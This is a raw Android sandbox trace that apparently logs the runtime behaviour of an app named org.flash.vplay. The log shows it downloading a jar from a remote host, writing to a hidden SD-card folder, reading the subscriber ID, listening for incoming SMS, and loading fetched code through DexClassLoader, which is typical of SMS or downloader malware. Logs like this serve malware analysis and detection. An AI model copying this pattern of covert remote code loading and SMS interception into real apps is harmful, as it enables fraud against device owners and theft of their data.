D/S4URC   ( 2475): [SDK] [android.os.Environment] [getExternalStorageDirectory] [DirectoryPath][String] [/storage/sdcard0]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/.xxx/]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/storage/sdcard0/.xxx]
D/S4URC   ( 2475): [SDK] [java.io.File] [mkdirs] [FilePath][String] [/storage/sdcard0/.xxx]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/storage/sdcard0/.xxx/adc.dex]
D/S4URC   ( 2475): [SDK] [java.io.File] [createNewFile] [FilePath][String] [/storage/sdcard0/.xxx/adc.dex]
D/S4URC   ( 2475): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://d.absopu.info:8981/static/d/test0518.jar]
D/S4URC   ( 2475): [SDK] [android.app.ApplicationPackageManager] [getPackageInfo] [FindPackageName][String] [org.flash.vplay]
D/S4URC   ( 2475): [SDK] [android.telephony.TelephonyManager] [getSubscriberId]
D/S4URC   ( 2475): [SDK] [android.app.ApplicationPackageManager] [getPackageInfo] [FindPackageName][String] [org.flash.vplay]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.net.conn.CONNECTIVITY_CHANGE,
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][action.scheduler.access.trigger.timer,
D/S4URC   ( 2475): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [action.scheduler.access.trigger.timer]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/databases]
D/S4URC   ( 2475): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/data/data/org.flash.vplay/databases]
D/S4URC   ( 2475): [SDK] [java.io.File] [mkdir] [FilePath][String] [/data/data/org.flash.vplay/databases]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/databases]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/databases/access.db]
D/S4URC   ( 2475): [SDK] [javax.crypto.spec.SecretKeySpec][Constructor] [KEY][30212102dicudiab][type][AES][javax.crypto.Cipher][getInstance] [Cipher][AES/ECB/PKCS5Padding] [javax.crypto.Cipher][doFinal] [Data][DF92CADE3B15C97907848A2F94CFCB1E|0] [Return][Y5HBr2xmbuN1LR7WPjzSCw3KtDNdiIIpnpV0Bx/z/k5w23FlC9a8o8b3xRqg7St+]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][aa.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][cuid] [Return][null]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][aa.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][cuidsec] [Value][Y5HBr2xmbuN1LR7WPjzSCw3KtDNdiIIpnpV0Bx/z/k5w23FlC9a8o8b3xRqg7St+]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/databases/access.db]
D/S4URC   ( 2475): [SDK] [android.database.sqlite.SQLiteDatabase] [execSQL] [ExecInfo][String] [CREATE TABLE IF NOT EXISTS access_tbl (key INTEGER PRIMARY KEY AUTOINCREMENT,apn TEXT,domain TEXT,iplist TEXT,apn_lasttime INTEGER,schedule_lasttime INTEGER);]
D/S4URC   ( 2475): [SDK] [android.database.sqlite.SQLiteDatabase] [execSQL] [ExecInfo][String] [PRAGMA user_version = 1]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][aa.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2475):  [Method][getBoolean] [Boolean][setchannelwithcode] [Return][false]
D/S4URC   ( 2475): [SDK] [android.app.ApplicationPackageManager] [getApplicationInfo] [FindApplicationName][String] [org.flash.vplay]
D/S4URC   ( 2475): [SDK] [android.app.ApplicationPackageManager] [getPackageInfo] [FindPackageName][String] [org.flash.vplay]
D/S4URC   ( 2475): [SDK] [android.app.ApplicationPackageManager] [getApplicationInfo] [FindApplicationName][String] [org.flash.vplay]
D/S4URC   ( 2475):  [Method][getBoolean] [Boolean][exceptionanalysisflag] [Return][true]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files/__local_except_cache.json]
D/S4URC   ( 2475):  [Method][getInt] [Int][sendLogtype] [Return][0]
D/S4URC   ( 2475):  [Method][getInt] [Int][timeinterval] [Return][1]
D/S4URC   ( 2475):  [Method][getBoolean] [Boolean][onlywifi] [Return][false]
D/S4URC   ( 2475): [SDK] [android.database.sqlite.SQLiteDatabase] [update] [updateInfo][String] [access_tbl] [SET][apn_lasttime=1535038343239] [WHERE][apn=?]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][connectTimeout] [Return][15000]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][readTimeout] [Return][15000]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][apnCachedNum] [Return][8]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][parallelNum] [Return][2]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][expireTime] [Return][1440]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][samplingInfo] [Return][null]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][getIong] [Iong][timeStamp] [Return][0]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][access_cm] [Return][]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][access_uni] [Return][]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][putLong] [Key][FLAG_DOWNLOAD] [Value][1535038346000]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml.bak]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.provider.Telephony.SMS_RECEIVED,
D/S4URC   ( 2475):  [Method][getInt] [Int][pay_video] [Return][1]
D/S4URC   ( 2475): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/.xxx/adc.dex]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/.xxx/adc.dex] [RETURN][int] [-1]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.provider.Telephony.SMS_RECEIVED,
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][org.flash.vplaysys_sended,
D/S4URC   ( 2475): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 2475): [SDK] [android.telephony.TelephonyManager] [getSubscriberId]
D/S4URC   ( 2475): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/files/ext.jar] [RETURN][int] [79]
D/S4URC   ( 2475): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files/jarData.jar]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/files/jarData.jar]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][putLong] [Key][FLAG_DOWNLOAD] [Value][1535038349000]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/event_flag.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [rename] [ORIG_PATH][string] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml] [NEW_PATH][string] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml] [RETURN][int] [77]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml] [MODE][int] [0660]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [unlink] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [dalvik.system.DexClassLoader] [Constructor] [DexPath][String] [/data/data/org.flash.vplay/files/ext.jar] [NDKPath][String] [null]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [dalvik.system.BaseDexClassLoader] [Constructor] [DexPath][String] [/data/data/org.flash.vplay/files/ext.jar] [NDKPath][String] [null]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [canRead] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [canWrite] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [SDK] [java.io.File] [getName] [FilePath][String] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [SDK] [java.io.File] [isFile] [FilePath][String] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [SDK] [java.io.File] [getName] [FilePath][String] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/files/ext.dex]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/org.flash.vplay/files/ext.dex]
D/S4URC   ( 2475): [SDK] [java.io.File] [getParent] [FilePath][String] [/data/data/org.flash.vplay/files/ext.dex]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [dalvik.system.DexFile] [openDexFile] [DexPath][String] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/org.flash.vplay/files/ext.dex]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/files/ext.jar] [RETURN][int] [77]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/files/ext.dex] [RETURN][int] [77]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/files/ext.dex]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/files/ext.dex] [RETURN][int] [83]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/system]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data]
D/S4URC   ( 2644): [NDK] [SYSCALL] [execve] [PATH][string] [/system/bin/dex2oat] [INST][string] [/system/bin/dex2oat --runtime-arg -classpath --runtime-arg /system/framework/SamsungBridge.jar --instruction-set=arm --instruction-set-features=div --runtime-arg -Xnorelocate --boot-image=/system/framework/boot.art --dex-file=/data/data/org.flash.vplay/files/ext.jar --oat-fd=77 --oat-location=/data/data/org.flash.vplay/files/ext.dex --runtime-arg -Xms64m --runtime-arg -Xmx512m ]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/databases/access.db]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal] [RETURN][int] [80]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-wal]
D/S4URC   ( 2475): [SDK] [android.database.sqlite.SQLiteDatabase] [update] [updateInfo][String] [access_tbl] [SET][iplist=203.205.146.22:80,apn_lasttime=1535038349308,schedule_lasttime=1535038349306] [WHERE][apn=? and domain=?]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/databases/access.db]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal] [RETURN][int] [86]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-wal]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/databases/access.db]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal] [RETURN][int] [86]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/databases] [RETURN][int] [83]
D/S4URC   ( 2475): [SDK] [android.database.sqlite.SQLiteDatabase] [insert] [Table][String] [access_tbl]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/databases/access.db]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal] [RETURN][int] [83]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-wal]
D/S4URC   ( 2475): [SDK] [android.database.sqlite.SQLiteDatabase] [update] [updateInfo][String] [access_tbl] [SET][iplist=203.205.142.143:14000,apn_lasttime=1535038349308,schedule_lasttime=1535038349306] [WHERE][apn=? and domain=?]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/databases/access.db]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal] [RETURN][int] [86]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-wal]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/databases/access.db]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal] [RETURN][int] [80]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/databases] [RETURN][int] [86]
D/S4URC   ( 2475): [SDK] [android.database.sqlite.SQLiteDatabase] [insert] [Table][String] [access_tbl]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/databases/access.db]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal] [RETURN][int] [80]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-wal]
D/S4URC   ( 2475): [SDK] [android.database.sqlite.SQLiteDatabase] [update] [updateInfo][String] [access_tbl] [SET][iplist=,apn_lasttime=1535038349308,schedule_lasttime=1535038349306] [WHERE][apn=? and domain=?]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/databases/access.db]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal] [RETURN][int] [80]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-wal]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/databases/access.db]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal] [RETURN][int] [80]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/databases] [RETURN][int] [86]
D/S4URC   ( 2475): [SDK] [android.database.sqlite.SQLiteDatabase] [insert] [Table][String] [access_tbl]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/databases/access.db]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-journal] [RETURN][int] [86]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/databases/access.db-wal]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][putInt] [Key][connectTimeout] [Value][20000]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [RETURN][int] [80]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [MODE][int] [0660]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][Access_Preferences.xml] [MODE][MODE_PRIVATE] [Method][putInt] [Key][readTimeout] [Value][15000]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [rename] [ORIG_PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [NEW_PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml] [RETURN][int] [80]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/Access_Preferences.xml]
